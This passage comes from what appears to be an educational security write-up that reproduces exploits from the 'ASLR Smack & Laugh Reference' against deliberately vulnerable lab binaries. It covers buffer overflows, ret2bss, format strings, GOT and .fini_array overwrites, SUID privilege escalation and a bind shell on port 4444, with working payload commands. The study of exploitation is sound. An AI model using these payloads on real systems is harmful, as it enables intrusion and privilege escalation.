<p>Secondly, addresses changed. As the exploit uses fixed addresses for the procedure linkage table (PLT) and the global offset table (GOT) as well as the chain of <code>pop rdi; pop rsi; pop rdx; ret</code> found in the helper function, those addresses change when compiled with compiler optimizations.</p>
<p>Third, the original exploit made use of the <code>memset</code> function and overwrote its GOT entry in order to point to the <code>system</code> function instead. This is not possible anymore with the executable compiled with optimizations enabled, as <code>memset</code> was omitted from the executable and replaced by the following instructions (comments added for clarification):</p>
<div class="sourceCode" id="cb20"><pre class="sourceCode asm"><code class="sourceCode fasm"><a class="sourceLine" id="cb20-1" data-line-number="1"><span class="bu">xor</span>    %<span class="kw">eax</span>,%<span class="kw">eax</span>            # Zero <span class="bu">out</span> <span class="kw">eax</span></a>
<a class="sourceLine" id="cb20-2" data-line-number="2"><span class="bu">mov</span>    <span class="dv">$</span><span class="bn">0x12,</span>%<span class="kw">ecx</span>           # Number of repetitions (<span class="dv">18</span>)</a>
<a class="sourceLine" id="cb20-3" data-line-number="3"><span class="bu">xor</span>    %<span class="kw">edx</span>,%<span class="kw">edx</span>            # Zero <span class="bu">out</span> <span class="kw">edx</span></a>
<a class="sourceLine" id="cb20-4" data-line-number="4"><span class="bu">push</span>   %<span class="kw">rbp</span>                 # Save base frame pointer</a>
<a class="sourceLine" id="cb20-5" data-line-number="5"><span class="bu">sub</span>    <span class="dv">$</span><span class="bn">0xa8</span>,%<span class="kw">rsp</span>           # Increase <span class="bu">stack</span> size</a>
<a class="sourceLine" id="cb20-6" data-line-number="6"><span class="bu">mov</span>    %<span class="kw">rsp</span>,%<span class="kw">rbp</span>            # Update base frame pointer</a>
<a class="sourceLine" id="cb20-7" data-line-number="7"><span class="bu">mov</span>    %<span class="kw">rbp</span>,%<span class="kw">rdi</span>            # Set <span class="kw">rdi</span> to base frame pointer (address of buffer)</a>
<a class="sourceLine" id="cb20-8" data-line-number="8">rep <span class="bu">stos</span> %<span class="kw">rax</span>,%<span class="kw">es</span>:(%<span class="kw">rdi</span>)    # Set <span class="kw">ecx</span> quadwords to <span class="kw">rax</span> (= <span class="dv">0</span>), starting <span class="bu">from</span> <span class="kw">rdi</span> (buffer)</a>
<a class="sourceLine" id="cb20-9" data-line-number="9"><span class="bu">mov</span>    %<span class="kw">dx</span>,<span class="bn">0x4</span>(%<span class="kw">rdi</span>)        # Set <span class="kw">rdi</span> + <span class="dv">4</span> to <span class="dv">0</span></a>
<a class="sourceLine" id="cb20-10" data-line-number="10">movl   <span class="dv">$</span><span class="bn">0x0,</span>(%<span class="kw">rdi</span>)          # Set <span class="kw">rdi</span> to <span class="dv">0</span></a></code></pre></div>
<p>Those instructions set up the buffer and then zero it out. Thus, they replace the call to <code>memset</code> which would do exactly the same.</p>
<p>As <code>memset</code> now is not part of the executable anymore (in the PLT and GOT), an alternative is necessary. Luckily, the executable contains several calls to external functions which are listed in the PLT and GOT. Therefore, we can use for example <code>printf</code> and its PLT and GOT entries instead of those for <code>memset</code>.<br />
However, we cannot choose an arbitrary function to replace <code>memset</code>: If we overwrote the GOT entry of <code>read</code> instead of <code>memset</code>, the exploit would not work anymore as it relies on <code>read</code> to manipulate the memory (GOT entries and .bss section).</p>
<p>As a proof of concept for those changes, the <a href="./64bit%20Stack%20smashing%20-%20superkojiman/poc_local_optimized.py">poc_local_optimized.py</a> Python script manages to spawn a shell and elevate the privileges if the SUID bit is set for the executable compiled with compiler optimizations enabled. The differences between <code>poc_local.py</code> and <code>poc_local_optimized.py</code> can be transferred to the network-based exploits (<code>poc.py</code>, <code>poc_advanced.py</code>) analogously (changes in padding size and addresses).</p>
<h1 id="aslr-smack-and-laugh">ASLR Smack and Laugh</h1>
<p>The <a href="ttps://api.semanticscholar.org/CorpusID:16401261">ASLR Smack &amp; Laugh Reference</a> by Tilo Müller, published in 2008, describes several methods how to bypass protection by Address Space Layout Randomization built into the Linux kernel.<br />
As he uses a Linux installation with kernel 2.6.23, glibc 2.6.1 and gcc 4.2.3, several of his described exploits might not work as described on modern machines. Additionally, his machine is a 32 bit machine which is why all the executables are compiled in 32 bit mode (see the <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/Makefile">Makefile</a>).</p>
<p><strong>For these exploits, ASLR is of course activated in the Linux kernel</strong> (e.g. by issuing the command <code>echo 2 | sudo tee /proc/sys/kernel/randomize_va_space</code>).</p>
<h2 id="general-observations">General observations</h2>
<p>In section 2, Tilo Müller describes the functioning of ASLR.<br />
On his machine, the heap address as well as the addresses of the <code>.text</code>, <code>.data</code> and <code>.bss</code> sections of the executable are not randomized. All of those addresses are randomized on a modern machine by default (see also the <a href="#virtual-machine-setup">section about the VM setup</a>). This makes it harder to run the exploits the same way he does. It is not possible to have a fixed heap address without turning off ASLR in general. According to <a href="https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html">the Linux kernel documentation</a>, setting the ASLR option to 1 should randomize the stack addresses but not the heap addresses. As the documentation hasn’t been updated since kernel version 2.2 (as of 08/04/2020), this behavior seems to have changed for current kernel versions, as the heap base address is always randomized if the <code>randomize_va_space</code> kernel option is set to a value other than 0.<br />
The latter sections of the executable however can be accessed without randomization: compiling with the <code>-fno-pic</code> compiler flag and linking with the <code>-no-pie</code> linker flag allows to have position dependent executables which have absolute addresses always loaded at the same base address.</p>
<h2 id="aggression">Aggression</h2>
<h3 id="brute-force">Brute force</h3>
<p><a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/bruteforce.c">bruteforce.c</a> contains a buffer overflow vulnerability. With ASLR turned on, it is not possible to deterministically overflow this buffer and execute some shellcode, as the address of the buffer containing the shellcode changes with every run.<br />
Thus, the shellcode is placed in a buffer with a big NOP sled in front of the shellcode. Here, the buffer is very big (4096 bytes) and it is thus easily possible to hit the NOP sled by brute forcing the overflow. If the buffer was smaller, we could also place the shellcode with the NOP sled in an environment variable and just overflow the buffer with addresses pointing to the environment variable, as it was done in previous sections.</p>
<p>The <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/bfexploit.c">bfexploit</a> executable prepares a buffer with the shellcode and an address to overflow the buffer in the vulnerable executable. The <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/bfexploit.sh">bfexploit.sh</a> shell script then executes the vulnerable executable over and over again until the buffer is correctly overflowed and the overwritten return pointer points somewhere into the NOP sled in front of the shellcode.</p>
<p>As given in the paper, the base address used for calculating pseudo-random addresses for overwriting the return pointer was <code>0xbf010101</code>. This address however would not work out, as the stack addresses on modern machines with randomized addresses start with <code>0xff</code>. Changing <code>0xbf010101</code> to <code>0xff010101</code> finally led to success after a certain amount of attempts.</p>
<h3 id="denial-of-service">Denial of service</h3>
<p>As we can see during the execution of a <a href="#brute-force">brute force attack</a>, the executable segfaults most of the time because we’re overwriting the return address with an invalid value.</p>
<p>The same applies for format string vulnerabilities: if looking at the <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/formatStringDos.c">formatStringDos</a> executable, it is fully sufficient to give several <code>%s</code> parameters until the <code>printf</code> call tries to read from memory where it isn’t allowed to read from and crashes. An even more reliable crash can be achieved by just giving <code>%n</code> parameters that try to write to memory, as the executable usually is allowed to write to even less memory than it is allowed to read from.</p>
<h2 id="return-into-non-randomized-memory">Return into non-randomized memory</h2>
<h3 id="ret2text">ret2text</h3>
<p>The exploit in this case relies on the executable being loaded to the same address everytime, even if the stack addresses change. The exploit itself is pretty easy then:</p>
<ul>
<li>Look up the address of the function we want to jump to (here: <code>secret</code>) via <code>gdb</code> or <code>objdump</code></li>
<li>Calculate the string used for overwriting the buffer (here: 16 bytes padding (12 for the buffer, 4 for the frame pointer) + return address)</li>
<li>Execute the program (here: <code>./ret2text $(python3 -c &quot;import sys; sys.stdout.buffer.write(b'A' * 16 + b'\xff\x91\x04\x08')&quot;)</code>)</li>
</ul>
<p>An interesting observation is that it is completely sufficient to call <code>./ret2text $(python3 -c &quot;import sys; sys.stdout.buffer.write(b'A' * 16)&quot;)</code>. This doesn’t actually overwrite the return address completely, in fact we’re not even accessing the memory where the return address resides intentionally. As any string ends with a 0 byte and we have little endian representation, the input consisting of 16 A characters (or any 16 bytes except 0 bytes) overwrites the lowest byte of the return address unintentionally with 0. Coincidentally, the return address formerly pointing back into the <code>main</code> function points to the second byte of the <code>secret</code> function if the last byte of the address is set to 0. Thus, the <code>secret</code> function is still executed without even knowing the correct address in this case.</p>
<h3 id="ret2bss">ret2bss</h3>
<p>The idea behind this exploit is the same as the one behind <a href="#ret2text">ret2text</a>: the .bss section of the executable always resides at the same static address and can thus easily be accessed, even when the stack addresses are randomized.<br />
The advantage over ret2text is that we often can control what is written to the .bss area (see e.g. <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2bss.c">ret2bss</a>). Thus, we can write our shellcode to the buffer in the .bss memory area and then conveniently access it by overflowing a buffer on the stack so that the return address points to our global buffer in .bss.</p>
<p>An important point to mention is that we still need an executable stack, even though we do not execute shellcode from the stack. This is because the .bss area in the executable (ELF) is marked as NOBITS (check e.g. with <code>readelf ./ret2bss -S</code>) which means that the address is fixed but the memory area is actually not part of the executable file itself but allocated when loading the program into memory based on the size of this section given in the file. Apparently, this allocated memory has the same permissions as the stack. Therefore, if the stack is not executable, data in the .bss section is also not executable.</p>
<h3 id="ret2data">ret2data</h3>
<p>This exploit works exactly the same way as <a href="#ret2bss">ret2bss</a> does. The only difference is that the buffer now is initialized with data and can thus be found in the .data section of the ELF executable instead of the .bss section. Therefore, the memory used for that buffer actually is part of the executable and not freshly allocated on runtime as it was with the .bss area.</p>
<p>Conviniently, even the buffer’s address stays the same when compiling the code (compare e.g. <code>objdump -d -j .data -j .bss ./ret2data</code> and <code>objdump -d -j .data -j .bss ./ret2bss</code>) and thus the same <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2bssexploit.c">exploit</a> works for both executables.</p>
<h3 id="ret2heap">ret2heap</h3>
<p>On modern systems, the heap addresses are randomized by ASLR as well. This makes it as hard to execute shellcode from the heap as from the stack. Therefore, the same strategies apply as for shellcode on the stack (e.g. <a href="#brute-force">brute force attacks</a>).</p>
<h2 id="pointer-redirecting">Pointer redirecting</h2>
<h3 id="string-pointers">String pointers</h3>
<p>With hardcoded strings in the executable, it is pretty easy to find their addresses using <code>gdb</code> or <code>objdump</code>. If we can then create an executable (here: <code>echo &quot;/bin/sh&quot; &gt; THIS &amp;&amp; chmod 777 THIS &amp;&amp; export PATH=.:$PATH</code>) that has the same name as the first word of one of the hardcoded strings, we can just overwrite the address of one string with the address of another and thus execute a different command than the vulnerable program’s author intended to.</p>
<p>The <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/strptrexploit.sh">strptrexploit.sh</a> bundles all the necessary steps in a shell script.</p>
<p>The main point to mention here is that the file we’re executing (here: <code>THIS</code>) not necessarily has to spawn a shell. This file can contain any shell script we want. For example, if such a vulnerability occurs on a server reachable over the network, we cannot directly access the shell this script spawns if it just contains the <code>/bin/sh</code> command as in the example above. Thus, we might want to have a shell script that opens a reverse shell over the network or something similar.<br />
If and how such a vulnerability can be exploited of course differs from case to case and depends on how we can place the shell script on the vulnerable machine so that the vulnerable program actually executes it.</p>
<h3 id="function-pointers">Function pointers</h3>
<p>The same as for <a href="#string-pointers">string pointers</a> applies for function pointers. It is easy to find the addresses if such a vulnerability can be found.</p>
<p>In the given example, we can overwrite the function pointer with the address of <code>system</code>’s PLT entry. Thus, <code>system</code> is executed instead of the actual function. With the command <code>./funcptr &quot;$(python3 -c &quot;import sys; sys.stdout.buffer.write(b'A' * 64 + b'\xa0\x90\x04\x08')&quot;)&quot; /bin/sh</code>, we can spawn a shell. The first argument overwrites the pointer, the second argument contains the command to execute.</p>
<p>However, this kind of exploit is probably mightier than the string pointer exploit: with the latter, we can only control which new program to execute. With the former, we can call whatever function we like. Theoretically, it is thus possible to not only call a specific function (here: <code>system</code>) but also to create a gadget chain that builds up our shellcode.<br />
This might be interesting in the context of the SUID bit being set: with a string pointer redirection, the program itself would already have to invoke <code>setuid</code> so that the sub-program we control has the elevated privileges. With a function pointer redirection and a ROP chain built up, we can execute whatever we want - e.g. the syscall for <code>setuid</code> and then spawn a shell with the elevated privileges we just obtained.</p>
<h2 id="integer-overflows">Integer overflows</h2>
<h3 id="width-overflow">Width overflow</h3>
<p>In the example in <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/width.c">width.c</a>, a <code>char</code> is used to hold the length of the string. The problem that arises is that the maximum positive value of a <code>char</code> is 127 and the buffer size is fixed to 64. If we know input a string longer than 127 bytes (e.g. 128 bytes), we achieve an overflow and we can control the value of the <code>char</code> holding the string length. If we input for example a string with a length of 128 bytes, <code>isize</code> holds the value -128 after measuring the string length because of the overflow and we can copy the input to the buffer and achieve a buffer overflow.</p>
<p>For example with the command <code>./width $(python3 -c &quot;import sys; sys.stdout.buffer.write(b'A' * 88 + b'\xf6\x91\x04\x08' + b'A' * 36)&quot;)</code>, we jump to the secret function that is not used during normal execution. The first 88 bytes are used for padding until we reach the part of memory where the return address resides, the next four bytes overwrite the return address and the following 36 bytes are necessary to achieve a string length of 128 bytes and thus bypass the length check by overflowing the value of <code>isize</code>.</p>
<p>Just like with other methods above, this method could be used for building a ROP chain or similar. This is only possible because we have fixed addresses for ELF sections like <code>.text</code>, <code>.data</code> or <code>.bss</code>. Other addresses like the stack or the base address of libc are randomized which is why they are hard to exploit.</p>
<h3 id="signedness-bugs">Signedness bugs</h3>
<p>With this kind of bug we can overflow a buffer by giving a negative number. Copy functions (e.g. <code>memcpy</code>, <code>strncpy</code>, etc.) usually expect the size parameter to be an <em>unsigned</em> integer. When we now provide a negative number (i.e. a <em>signed</em> integer), it passes size checks, as it is smaller than the positive maximum size we check for. However, it is then interpreted as an unsigned number in the actual copy function which yields a huge number that reliably overflows the destination buffer.</p>
<p>In the <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/signedness.c">example</a> given for this kind of bug we cannot control the content of the overflown buffer and thus redirect execution. However, we can still achieve a Denial of Service attack and crash the executable.<br />
The interesting part hereby is that this can be achieved no matter what the security measures are. If we’re just aiming to crash the executable and such a bug is present, no stack protectors/canaries, ASLR mechanisms or other protection mechanisms can prevent us from successfully crashing the executable.</p>
<h2 id="stack-divulging-methods">Stack divulging methods</h2>
<h3 id="stack-stethoscope">Stack stethoscope</h3>
<p>With the help of the <code>/proc/PID/stat</code> file (where PID is the process id of the process we want to attack), we can find out the base stack address of a process. If we then also know the address of the buffer to overflow (e.g. found with GDB), we can calculate the offset of this buffer on the stack. With this offset, we can always calculate the correct address of the buffer where we put our shellcode.</p>
<p>The only problem is that we always need the base stack address which changes from run to run. Thus, this attack is only feasible on programs that already run for a longer time when they expect us to provide input (i.e. not feasible for buffer overflows based on program call arguments), for example network daemons. As the <code>/proc/PID/stat</code> file is readable by anybody, we don’t even need special privileges, no matter what privileges the program to attack runs with.</p>
<p>An example can be found with the <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/divulge.c">divulge</a> daemon: it expects input over the network and prints the same input back (more or less like a call to <code>cat</code> over the network). There is a buffer overflow vulnerability in <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/divulge.c#L12">line 12</a> which copies the input into a buffer without checking for the size of the input. Thus, we can overwrite the return address with the address of the buffer itself that we calculated with the help of the stack base address and the offset and execute shellcode we put in the buffer.<br />
Weirdly, this exploit did not work with the SUID bit set on the daemon but only produced a segmentation fault. The same input without the SUID bit set works and spawns a shell. This issue should be investigated further.</p>
<h3 id="formatted-information">Formatted information</h3>
<p>In the <a href="#stack-stethoscope">stack stethoscope</a> section access to the machine was necessary to always get the base of the stack by reading the corresponding <code>/proc/PID/stat</code> file. We now want to execute an exploit from remote, i.e. without accessing this file.</p>
<p>The approach for such an exploit is the following:</p>
<ul>
<li>Exploit the format string vulnerability: return an address from the stack</li>
<li>Get the offset of this address from the stack base address by looking into <code>/proc/PID/stat</code> once and calculating the offset<br />
This can also be done locally as we’re not looking for an address but only for an offset.</li>
<li>Send two requests:
<ol type="1">
<li>Get the address on the stack with the help of the format string vulnerability</li>
<li>Execute the stack buffer overflow</li>
</ol></li>
<li>Between the two requests: calculate address used for stack buffer overflow in the same manner as for the stack stethoscope</li>
</ul>
<p>We thus make use of both vulnerabilities: a format string vulnerability and a stack buffer overflow vulnerability. The actual exploit can then be conducted with the <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/divexploit_remote.sh">divexploit_remote.sh</a> bash script. It already contains the necessary offset to calculate the stack base address.</p>
<p>If executing <code>./divulge</code> in one terminal window and <code>./divexploit_remote.sh</code> in another, we can observe that a shell spawns in the terminal window of <code>./divulge</code>. This behavior makes sense: we’re executing shellcode in the daemon’s context. However, in real life this is inconvenient as we cannot execute shell commands as a local attacker if the shell opens up remotely. Thus, compiling <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/divexploit.c">divexploit.c</a> with shellcode spawning a reverse shell makes more sense (<code>sc = net_shellcode;</code> instead of <code>sc = shellcode;</code> in <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/divexploit.c#L14">line 14</a>). Instead of spawning a shell in the terminal window <code>./divulge</code> is running in, a shell is bound to a port given in the shellcode (here: 4444) so that the shell can be conveniently accessed from remote (here: <code>nc localhost 4444</code>).</p>
<h2 id="stack-juggling-methods">Stack juggling methods</h2>
<h3 id="ret2ret">ret2ret</h3>
<p>This approach aims to overwrite the last byte of a pointer on the stack with a null byte. Thus, the address becomes smaller if the last byte wasn’t already <code>0x00</code> and therefore points to a position later in the stack frame or even in a newer stack frame.</p>
<p>Such an overwrite is pretty easy: every string ends with a <code>0x00</code> byte. When we now overflow a buffer on a little endian machine by the right number of bytes, we don’t overwrite the whole pointer but only it’s last byte with a null byte.</p>
<p>We thus want to overwrite a buffer as follows:</p>
<ul>
<li>Put a NOP sled in the start of the buffer</li>
<li>Put shellcode after the NOP sled but before the return address</li>
<li>Overwrite the return address and all following stack values with the address of a <code>ret</code> instruction from the executable up until the pointer in question</li>
</ul>
<p>If we then execute the program, the following happens: the return address is overwritten with the address of a <code>ret</code> instruction which then returns to the next <code>ret</code> instruction and so on until we reach the pointer. If we’re lucky, the pointer then points into our NOP sled because we overwrote the last byte and the program returns to the shellcode. If we’re not lucky, the program just crashes.<br />
However, as the addresses are randomized, we just need to try several times until we succeed (as long as the offset to the shellcode is small enough so that overwriting a single byte is sufficient).</p>
<p>Therefore, calling <code>./ret2ret &quot;$(./ret2retexploit)&quot;</code> works most of the time but sometimes just yields a segmentation fault or encounters an illegal instruction.</p>
<h3 id="ret2pop">ret2pop</h3>
<p>The ret2pop approach is very similar. The difference is that it doesn’t try to modify a pointer to return to but to take an existing pointer to return to (e.g. a pointer to the program call’s arguments).</p>
<p>As we’re looking for a perfect existing pointer, we don’t want to overwrite its last byte. Thus, the return chain is shortened by one and the last instruction is not a simple <code>ret</code>, but a <code>pop; ret</code>. Therefore, the program enters the return chain as above and returns from one <code>ret</code> instruction to the next until it encounters a <code>pop</code> instruction, then pops the last value between our return chain and the perfect pointer and finally returns to the perfect pointer (pointing to the shellcode).<br />
It doesn’t matter which register the <code>pop</code> instruction pops into, it is just important that it removes one word from the stack.</p>
<p>As we have a perfect pointer here (the pointer to <code>argv[1]</code>), the call <code>./ret2pop &quot;$(./ret2popexploit)&quot;</code> always works even without a NOP sled because we’re automatically pointing to the start of the shellcode without any address ambiguities.</p>
<h3 id="ret2esp">ret2esp</h3>
<p>The ret2esp approach is a little bit different in comparison to <a href="#ret2ret">ret2ret</a> and <a href="#ret2pop">ret2pop</a>. Instead of traversing the stack until we reach the shellcode, this approach is based on just jumping directly to the shellcode by finding a <code>jmp esp</code> instruction in the shellcode and pointing the return address to this shellcode.</p>
<p>The interesting part here is that usually, the shellcode is placed on the stack before the return address, i.e. into the actual buffer we want to overflow. With this approach, the shellcode is placed on the stack after the return address, i.e. into the overflown part of the buffer.<br />
The <code>ret</code> instruction then pops the return address (i.e. the address of <code>jmp esp</code>) from the stack and the stack pointer thus then points to the shellcode. When the <code>jmp esp</code> instruction is now executed, the program continues execution directly on the stack code, as <code>esp</code> contains the address of the shellcode.</p>
<h3 id="ret2eax">ret2eax</h3>
<p>ret2eax works similarly to ret2esp, we don’t traverse the stack until we hit the shellcode but we just overwrite the return address with the address of a single instruction. Here, the instruction we’re looking for is <code>call *%eax</code>. This instruction usually is generated by the compiler somewhere in the executable, even if not in the own code. Thus, it should be possible to find such an instruction.</p>
<p>This approach is based on the return behavior of functions: even if we don’t save their return value somewhere or don’t return anything, a return value is saved in the register <code>eax</code>. In our examplary code in <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c">ret2eax.c</a>, we don’t save the return value of <code>strcpy</code>, which is a pointer to the destination buffer (i.e. the buffer that contains our shellcode). As the function <code>function</code> returns immediately after the call to <code>strcpy</code>, <code>eax</code> is not overwritten with another value and thus still contains the address of the buffer when returning.<br />
By overwriting the return address with the correct value, we can then return to the instruction <code>call *%eax</code> which lets the program continue execution directly at our shellcode.</p>
<h2 id="got-hijacking---ret2got">GOT hijacking - ret2got</h2>
<p>The ret2got exploit is pretty similar to the <a href="#function-pointers">function pointer redirection</a> exploit. During the latter exploit, we overwrite a function pointer with the address of the PLT entry of the <code>system</code> function. The function pointer we’re overwriting is located in the same function and thus also on the stack.</p>
<p>During the ret2got exploit, we’re also overwriting a function pointer: the GOT entry of <code>printf</code>. We overwrite a pointer to an array with the address of <code>printf</code>’s GOT entry and then overwrite this entry with the address of <code>system</code>’s PLT entry. The next call to <code>printf</code> then executes <code>system</code> instead with the arguments passed to <code>printf</code>.</p>
<p>As we can only partially control the arguments of <code>printf</code>, it is necessary to set up an environment similar to the one from the <a href="#string-pointers">string pointer redirection exploit</a>, where we cannot control the input to <code>system</code> but where we provide an executable shell script whos name matches the first word of the <code>system</code> argument. This script can be created by the command <code>echo /bin/sh &gt; Array &amp;&amp; chmod 777 Array &amp;&amp; export PATH=.:$PATH</code>. Calling then <code>./ret2got &quot;$(python3 -c &quot;import sys; sys.stdout.buffer.write(b'A' * 8 + b'\x0c\xc0\x04\x08')&quot;)&quot; &quot;$(python3 -c &quot;import sys; sys.stdout.buffer.write(b'\xa0\x90\x04\x08')&quot;)&quot;</code> yields the described exploit.</p>
<p>The steps to this exploit are combined into the <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2gotexploit.sh">ret2gotexploit.sh</a> shell script.</p>
<p>Similar to the function pointer redirection exploit, we could theoretically overwrite <code>printf</code>’s GOT entry with whatever address we want. We could thus not only replace the function that is called but also create a ROP chain to which we point.</p>
<h2 id="off-by-one">Off by one</h2>
<p>The off-by-one vulnerability is a vulnerability that allows just overflowing the buffer by a single byte. This doesn’t sound like much but in some cases, this single byte might already be enough.</p>
<p>Because of little endian representation, such an overflow can at most affect the least significant byte of the saved frame pointer which can be found between the return address and the variables on the stack. In the function prologue, this pointer is popped into <code>ebp</code> which in the next function prologue is moved into <code>esp</code>. Thus, we cannot directly control the program flow when returning from the vulnerable function but only when the program returns from the next function that called the vulnerable function.</p>
<p>The overwritten byte usually gets turned into a <code>0x00</code> byte, as such a vulnerability most of the time occurs when copying a string and strings end with a <code>0x00</code> byte. Thus, we can lower the saved frame pointer and by some luck it might point back into the buffer that was used for the overflow.<br />
The strategy is then as follows:</p>
<ol type="1">
<li>Fill the buffer with a <code>ret</code> chain that ends in a <code>jmp esp</code> instruction (similar to the <a href="#ret2esp">ret2esp</a> exploit)</li>
<li>Place the shellcode after the address of such a <code>jmp esp</code> instruction (possibly padded with NOPs to achieve the correct buffer size and stack alignment)</li>
</ol>
<p>When passing such a buffer to a vulnerable function, <code>ebp</code> possibly (not necessarily because of ASLR, several attempts might be necessary) points into our buffer after the function prologue. Upon the next function return, <code>esp</code> points into the <code>ret</code> chain in the buffer. Thus, when returning from the function, the <code>ret</code> chain from the buffer is executed and <code>esp</code> is increased up to the address of <code>jmp esp</code>. Then, this instruction is executed and as <code>esp</code> now points to the shellcode in the buffer, the shellcode is executed.</p>
<p>All in all, this exploit is a combination of previous techniques: firstly, it is similar to the <a href="#ret2ret">ret2ret</a> exploit which also depends on overwriting the last byte of a pointer. However, in that case, the pointer is not a saved frame pointer but a pointer residing in the program space. Secondly, it makes use of techniques from the <a href="#ret2esp">ret2esp</a> exploit to place shellcode on the stack and reliably jump to that shellcode.</p>
<h2 id="overwriting-.dtors">Overwriting .dtors</h2>
<p>This exploit aims to overwrite the <code>.dtors</code> containing pointers to destructor functions which are run after the <code>main</code> function returns with the help of a format string vulnerability. The overwritten pointers should then point to an array on the heap containing shellcode to execute. It is thus more or less a ret2heap exploit with the difference that not the return address is overwritten with a pointer to the heap by a simple stack buffer overflow but a destructor function pointer by a string format vulnerability.</p>
<p>There are several reasons why this exploit does not work exactly like that:</p>
<ol type="1">
<li>A <code>.dtors</code> section does not exist in executables created by modern compilers/linkers. There is a pretty much equivalent section, <code>.fini_array</code> which also contains pointers to functions which should be run after <code>main</code> returns. However, the structure is a little bit different, as <code>.dtors</code> has start and end markers (<code>0xffffffff</code> and <code>0x00000000</code>, respectively) which <code>.fini_array</code> does not have.</li>
<li>With modern ASLR, heap addresses are also completely randomized and we cannot use the heap to store the shellcode. A solution to that issue is storing the shellcode in a global array (which is located in the non-randomized <code>.bss</code> section of the ELF executable) instead. Thus, the exploit becomes a ret2bss exploit instead of ret2heap. It works exactly the same way, only the location of the shellcode is different.</li>
<li>In the paper by Tilo Müller, he puts the <code>.dtors</code> address at the start of the vulnerable string and refers to that address by the eighth format string placeholder. He thus has seven format string placeholders in front helping him to control the number to write to the address with the <code>%n</code> format string placeholder (e.g. by controlling the length of the output by <code>%.mx</code> where <code>m</code> is the length to output). Because of different behaviour with modern compilers, this is not the case anymore: when putting the address in the front of the string, the first format string placeholder automatically accesses this address. Thus, we can for example control the number to write via <code>%n</code> by padding the string with junk between the address and the <code>%n</code> placeholder. This is a problem because the command line (here: bash 5.0.16) only accepts string of a certain length as parameter to a function. Because hex addresses transformed into decimal numbers are huge and our padding thus has to be extremely long, we cannot directly write the address we want with the help of <code>%n</code>.<br />
When looking at the data in <code>.fini_array</code>, we see that the pointer located there points to an address starting with <code>0x0804</code>. The address located there thus is in the address space of our ELF executable. It is thus sufficient to overwrite only the lower two bytes of this pointer with the lower two bytes of the address of our array in the <code>.bss</code> section. This can be achieved by using <code>%hn</code> instead of <code>%n</code> as format string placeholder.<br />
As an alternative, we could also specifically refer to the address as the first parameter on the stack by <code>%1$.hn</code> and pad with <code>%.mx</code> where <code>m</code> is the length to output before as originally intended.</li>
<li>The <code>.fini_array</code> section is subject of RELRO (relocation read-only). Even though it is marked writable in the output of <code>readelf -S ret2dtors</code>, it is marked as read-only by the dynamic linker on program start. Thus, we only get a segmentation fault when trying to overwrite a pointer in this section like described above.<br />
The solution is to disable RELRO by passing the additional linker flag <code>-z norelro</code> when linking the executable.</li>
</ol>
<p>In conclusion, an exploit is possible (commands <code>./ret2dtors &quot;$(./shellcode)&quot; &quot;$(python3 -c &quot;import sys; sys.stdout.buffer.write(b'\x68\xb1\x04\x08' + b'A' * 45724 + b'%hn')&quot;)&quot;</code> or <code>./ret2dtors &quot;$(./shellcode)&quot; &quot;$(python3 -c &quot;import sys; sys.stdout.buffer.write(b'\x68\xb1\x04\x08 %.45722x %1$.hn')&quot;)&quot;</code> where <code>shellcode</code> is a helper executable just outputting shellcode (see <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/shellcode.c">shellcode.c</a>)) but only with severe changes.<br />
Firstly, it is not possible to use the heap. We have to rely on an array in the <code>.bss</code> or <code>.data</code> section (c.f. <a href="#ret2bss">ret2bss</a> and <a href="#ret2data">ret2data</a>), i.e. a global array.<br />
Secondly, we have to link the executable with RELRO disabled.</p>
<h2 id="optimizing-compilation-2">Optimizing compilation</h2>
<p>By default, no compiler optimizations were enabled during building all the executables (i.e. <code>-O0</code> compiler flag which is active by default in GCC). This section describes the differences that occur when recompiling the executables with the <code>-O3</code> compiler flag, i.e. GCC’s highest optimization options enabled. The term “differences” here refers to necessary changes in the code basis or command line commands to get the exploits to work or to significant interesting changes in program or memory layout.</p>
<h3 id="return-into-non-randomized-memory-1">Return into non-randomized memory</h3>
<p>For the <code>ret2text</code> executable, the only necessary change is to lower the padding by 4 bytes and change the address we want to jump to. This is because the optimized compilation output omits saving the <code>rbp</code> register to the stack (i.e. saving the frame pointer). Thus, the return address lies directly after the 12 bytes buffer on the stack. In addition, the address for the <code>secret</code> function changes because GCC rearranges the functions.<br />
In conclusion, the command <code>./ret2text $(python3 -c &quot;import sys; sys.stdout.buffer.write(b'A' * 12 + b'\x60\x92\x04\x08')&quot;)</code> yields the same success <a href="#ret2text">as the previous command</a>. However, just calling <code>./ret2text $(python3 -c &quot;import sys; sys.stdout.buffer.write(b'A' * 12)&quot;)</code> does not work anymore, as the return address then does not point into the secret function anymore as it coincidentally was the case in the non-optimized version.</p>
<h3 id="pointer-redirecting-1">Pointer redirecting</h3>
<h4 id="string-pointers-1">String pointers</h4>
<p>The <code>strptr</code> executable suddenly is not exploitable anymore, at least not in the way it was intended to. There is still a buffer overflow vulnerability which can be used to overwrite the return address.</p>
